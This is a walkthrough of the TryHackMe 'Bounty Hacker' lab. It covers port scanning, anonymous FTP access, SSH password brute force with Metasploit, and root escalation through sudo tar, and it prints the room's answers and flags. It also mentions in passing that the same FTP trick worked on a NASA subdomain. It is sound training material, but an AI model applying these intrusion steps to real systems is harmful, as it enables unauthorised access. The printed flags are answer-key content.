TryHackMe - Bounty Hacker
“Bounty Hacker” on TryHackMe is an easy difficulty room. In this article, I’ve compiled my walkthrough of the room.
This will be my first English content, so please let me know if I have made any spelling or sentence mistakes.(I would also like to point out that I used translation)
I’m starting with an NMAP scan.
nmap -sS -sV -Pn -v <target_ip>
When I examine the NMAP scan results, I see that the FTP-SSH-HTTP ports are open.
I’m looking at the website, I’m looking at the Source Code, I’m doing a directory scan with Gobuster, but I can’t find anything except the /images directory.
I already noticed the /images directory in the path field of the image when I looked at the Source Code of the page, so it wasn’t extra for me.
From this moment on I realize that I will continue my operations via FTP and SSH ports and I try an anonymous connection directly via ftp.
The connection is established, my method worked.
with this simple method you could log in to a subdomain of NASA in 2023, this is very funny.
After connecting I checked what was in the directory, there were two .txt files, I downloaded them both to my machine and read them.
The .txt file named “locks” is, as the name suggests, a list of passwords.
The .txt file named “task” contains the username hint that we can use in the SSH connection.
Answers → lin & SSH (Our first two fillable answers!)
The only thing missing for the SSH connection is the password. I will get the password from the list by brute force.
in this case I can use hydra or metasploit tools to do Brute Force, I choose metasploit.
I select the ssh_login module, make the necessary settings on it and run it.
My session came quickly.
After finding the password, we can either use the session provided by metasploit or we can create a new ssh connection directly from the clean terminal and continue on our way.
Answer → RedDr4gonSynd1cat3
I set up a new ssh connection with the information i got. After the ssh connection i check the directories and get the first flag in the user.txt file.
Answer → THM{CR1M3_SyNd1C4T3}
Now its time for Privilege Escalation, there are a few ways i can try for that. i was looking for ways to exploit with the command
find / -perm /4000 2>/dev/null
and suddenly it occurred to me to run sudo -l command, i used the command and when i entered the password of my lin user i was able to get output, it didn’t give me any permission error. it also informed me that the lin user can run as root on bountyhacker.
I will try to become root via /bin/tar
I go to https://gtfobins.github.io/gtfobins/tar/#sudo and copy and paste the code under sudo completely into my terminal and ta-da! I am root.
As soon as I become root, I read /root/root.txt and get the last flag in the .txt file.
Answer → THM{80UN7Y_h4cK3r}
I hope I have not made any spelling mistakes or misinformation. Please let me know if you notice any omissions or errors.
For suggestions and questions, you can reach me on LinkedIn.
